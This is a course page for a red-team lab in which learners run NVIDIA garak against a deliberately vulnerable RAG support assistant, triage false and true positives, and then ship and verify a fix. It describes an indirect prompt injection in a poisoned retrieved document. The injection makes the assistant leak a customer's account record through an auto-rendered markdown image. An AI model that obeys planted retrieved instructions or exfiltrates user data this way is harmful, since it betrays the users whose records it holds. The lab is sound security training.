Fuzz an LLM App with garak: Run, Read, and Triage True vs False Positives

Run NVIDIA garak as an automated fuzzer against a real vulnerable RAG support assistant, read the JSONL run log and the per-probe DEFCON report, then do the skill that separates a scanner operator from a red teamer: triage the hits. Dismiss a detector false positive with evidence, confirm a genuine indirect prompt injection against an in-pod exfil listener, and watch the finding regress to zero after the fix ships.

90 min8 steps3 domainsAdvanced

Hands-on labs require Pro · $29.99/mo · cancel anytime

Map the attack surface

Query

Retriever

LLM

Poisoned doc

retrieved chunk

Answer

0%

Attack-success rate

Attacks blocked · benign answers pass

graded on real output, not the model's talk

What you'll learn

1
Recon: stand up the vulnerable target behind an OpenAI endpoint
You are automating red-team testing of DV-RAG-Support, ACME Cloud's
2
Run the scan: fire a broad garak discovery battery at the endpoint
garak runs a battery of probes (attack generators) against a generator and
3
Read the report: count hits per probe and grade the run
A garak run produces several artifacts:
4
Triage a false positive: dismiss a detector hit with evidence
Scanners over-report. The triage skill is asking, for every hit, "did the
5
Confirm a true positive: run the custom probe, prove the effect on the listener
A true positive is confirmed by reproducing the effect, not by trusting a
6
Harden the render sink: allow-list the one channel the finding rode out on
Switch hats. You confirmed a genuine finding in step 5, so now you ship the fix.
7
Distrust the retrieved context: reframe context as data, never instructions
The render allow-list from step 6 is the load-bearing fix: it closes the exfil
8
Verify the regression: fixed = 0 findings, reintroduced = re-trips
A fix only counts when you re-run the exact confirmed attack and watch it fail.

Prerequisites

Comfortable reading Python and JSON
Completed (or understand) Module 2 indirect prompt injection
No ML background required

Exam domains covered

Offensive AI SecurityLLM Application SecurityRed-Team Automation

Skills & technologies you'll practice

This advanced-level ai/ml lab gives you real-world reps across:

garakFuzzingRed-Team AutomationTriageFalse PositivesIndirect Prompt InjectionOWASP LLM01AI Red Team

What you'll do in this lab

This is a hands-on red-team automation lab. You point NVIDIA garak, a batteries-included LLM fuzzer and scanner, at a real Retrieval-Augmented Generation (RAG) support assistant called DV-RAG-Support and run a battery of attack probes against it. garak fires predefined attack prompts, scores each response with detectors, and writes a JSONL run log plus a per-probe DEFCON grade. Your job is the part a scanner cannot do for you: read the run and triage every hit, separating a genuine finding from a detector that merely pattern-matched.

You will dismiss a detector false positive with evidence from the run log, then confirm a genuine true positive the right way, by reproducing the effect against an in-pod exfil listener rather than trusting a detector score. The confirmed finding is an indirect prompt injection (OWASP LLM01) that leaks a customer's account record through an auto-rendered markdown image (OWASP LLM05 improper output handling), the same channel behind the real EchoLeak exploit. You finish by shipping the fix and re-running the battery to watch the finding regress to zero, the regression discipline a real red-team practice is built on.

Frequently asked questions

What is garak?

garak is NVIDIA's open-source LLM vulnerability scanner. You point it at a generator (a model or an LLM application behind an API), it runs predefined probes (attack generators), and detectors score each response. It is the discovery and fuzzing tool in a red-team toolkit: broad and opinionated, and it reports heuristic hits that you then triage.

What is the difference between a true and a false positive here?

A false positive is when a detector flags a response that did not actually achieve the attacker's goal: the model refused, or just quoted the payload, and a string-match detector counted it anyway. A true positive is a hit you can reproduce as a real effect. In this lab the true positive is an account record exfiltrating to an in-pod listener, which you confirm by reading the listener log, not by trusting a detector score.

Do I need a machine-learning background?

No. You read Python and JSON and reason about whether an attack actually fired. Everything model-specific is explained inline. The point of the lab is triage judgment and regression discipline, not model internals.